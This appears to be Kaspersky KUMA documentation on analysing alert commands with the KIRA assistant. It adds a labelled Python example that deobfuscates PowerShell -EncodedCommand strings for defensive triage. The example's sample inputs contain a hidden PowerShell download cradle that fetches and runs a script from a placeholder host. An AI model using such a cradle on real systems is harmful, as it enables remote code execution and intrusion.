Kaspersky Unified Monitoring and Analysis Platform

Analyze using KIRA

In KUMA, you can use Kaspersky Investigation & Response Assistant (KIRA) to analyze the command that triggered a correlation rule. The command is available for analysis only if normalization is configured to write it to an event field. Open the event card or the correlation event card and click Analyze with KIRA in the upper part of the card to send a query to KIRA. KIRA deobfuscates the command and, if the same command was already analyzed earlier, displays the cached result of that request. This helps when investigating alerts and incidents. Analysis results are kept in the cache for 14 days and are available for review during that time. Each time a request is sent, an audit event is generated.

This functionality is available in the RU region if the following conditions are satisfied:

  • An active license covering the AI module is available.

    If the license has expired, the analysis results remain available through tasks during the lifetime of the cache, that is, for 14 days from the moment the result is cached.

  • A certificate was uploaded when configuring the KIRA integration. You can get the certificate file in PFX format, packed in the <customer name>.ZIP archive, and the password for the certificate from Technical Support.
  • The user has one of the following roles with the corresponding access rights: General administrator, Administrator, Tier 2 analyst, Tier 1 analyst, or Junior analyst. Only a user with the General administrator role can configure the integration.

In this section

Configuring integration with KIRA

Analyzing using KIRA

Possible errors of the Analyze with KIRA task


Configuring integration with KIRA

To configure integration with KIRA:

  1. Get a license with the AI module and activate it in KUMA.
  2. In the KUMA web console, go to the Settings → AI services section and in the AI services window, go to the KIRA tab.
  3. On the KIRA tab, in the Certificate drop-down list, click Select file and upload the certificate file in PFX format, packed into the <customer name>.ZIP archive.
  4. In the Certificate password field, enter the password.
  5. If necessary, in the Proxy server drop-down list, select a previously created resource or create a new resource.
  6. Click Save.

    After clicking Save, you are prompted to accept the terms of use of the service. If you do not accept the terms of use, you cannot proceed to save settings and use the functionality.

    After saving the settings, the available number of tokens is displayed. The allowance is reset every day.

    If you want to disable this functionality, turn on the Disable toggle switch.

Integration is configured; you can proceed to analysis. Analysis is available for all events, both new and previously received.


Analyzing using KIRA

After configuring the integration, you can analyze commands using KIRA.

To perform an analysis:

  1. Go to the card of the event or correlation event and, on the toolbar of the event card, in the Analyze with KIRA drop-down list, select the field whose value you want to analyze.

    This opens the Analyze with KIRA window, displaying the command to be analyzed.

  2. In the Analyze with KIRA window, you can do the following:
    • If the command is obfuscated, it is deobfuscated automatically without spending tokens. If you want to analyze the command in its obfuscated form, in the Actions drop-down list, select Revert to original string. If necessary, you can deobfuscate the string again.
    • If you want to know in advance how many tokens the analysis will cost, in the Actions drop-down list, select Calculate size in tokens. Number of tokens for analysis = number of tokens to send the request + number of tokens to produce the response.
    • To analyze the command, click the Analyze button.

      If you have enough tokens, the analysis and the Query in KIRA task are started.

      Processing the request may take 30 seconds or longer.

      Tokens are expended even if the request returns an error saying that the requested topic is in the deny list; the information about remaining tokens is also updated.

The command is analyzed.
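Worked example of what the automatic deobfuscation step amounts to in the most common case, a PowerShell -EncodedCommand string, including the nested case in which the page notes the string may need to be deobfuscated again. This is an added example and is not KUMA or KIRA code: the regular expression, the layer limit, and the sample command strings are constructed assumptions, and KIRA's actual deobfuscation logic is not documented on this page. The page states that the step costs no tokens; the example does the equivalent locally, before anything would be sent for analysis.

```python
"""Added example (not KUMA/KIRA code): peel PowerShell -EncodedCommand layers
from a command string so the analyst sees the plain command, and keep the
original string when nothing can be decoded (the 'Revert to original string'
form)."""
from __future__ import annotations

import base64
import binascii
import re

# Assumed pattern: the -EncodedCommand flag and its documented short forms
# (-e, -ec, -en, -enc) followed by a base64 payload. KIRA's own matching is
# not described on the page.
_ENC_FLAG = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


def decode_once(command: str) -> str | None:
    """Decode one -EncodedCommand layer.

    PowerShell expects the payload as base64 over UTF-16LE text. Returns None
    when there is no flag or the payload is not valid base64/UTF-16LE, so a
    damaged or truncated event field is never turned into garbage.
    """
    m = _ENC_FLAG.search(command)
    if m is None:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def deobfuscate(command: str, max_layers: int = 5) -> tuple[str, int]:
    """Peel nested encoded layers until a plain command appears.

    Returns (command, layers_removed). If nothing could be decoded, the
    original string comes back unchanged with 0 layers, so the caller always
    has something to display. max_layers bounds work on adversarial input.
    """
    current = command
    for layers in range(max_layers):
        decoded = decode_once(current)
        if decoded is None:
            return current, layers
        current = decoded
    return current, max_layers


def encode_ps(command: str) -> str:
    """Build a sample the way 'powershell -EncodedCommand' expects it
    (UTF-16LE text, then base64). Used only to construct test input here."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample field values (not real telemetry).
PLAIN = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ONE_LAYER = "powershell.exe -NoP -W Hidden -enc " + encode_ps(PLAIN)
TWO_LAYERS = "powershell.exe -EncodedCommand " + encode_ps(ONE_LAYER)
BROKEN = "powershell.exe -EncodedCommand AAA"  # bad padding: left as-is

if __name__ == "__main__":
    for sample in (ONE_LAYER, TWO_LAYERS, PLAIN, BROKEN):
        text, layers = deobfuscate(sample)
        print(f"{layers} layer(s) removed: {text}")
```

The two-layer sample is the case for which the page offers "deobfuscate the string again": the first pass yields another powershell.exe command line with its own -enc payload, and only the second pass reaches the download cradle. Keeping the original string when decoding fails mirrors the Revert to original string action, and it is also the safer default when the event field was truncated during normalization.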

The result of the analysis is available in the same Analyze with KIRA window: the output, a brief summary, and a detailed analysis. You can also view the result in a separate window by clicking View result in the pop-up notification. This opens a separate KIRA result window, from which you can also click the link to Go to event. After the analysis is completed, the Result is displayed on the KIRA analysis tab in the event card and is available for viewing by all users with access to the Analyze with KIRA functionality.

You can also view the result of the analysis in the Task manager section in the properties of the Query in KIRA task. You can click the name of the task to select one of the following commands in the context menu:

  • View result shows the results of the task from the cache to any user with access to KIRA tasks; no tokens are expended.
  • Restart performs the analysis disregarding the data of the previous analysis stored in the cache; the analysis expends tokens.

Possible errors of the Analyze with KIRA task

HTTP code   Description
400         Invalid client certificate.
401         Missing certificate information. Please contact Technical Support.
403         Daily limit of tokens exhausted.
404         Error in request.
413         Maximum number of tokens for the request reached. Make the request smaller.
500         Unknown error of the service.
502         KIRA service unavailable.
503         Error getting access token in the service.
Other       Unknown error.
No code     Error while processing the request.
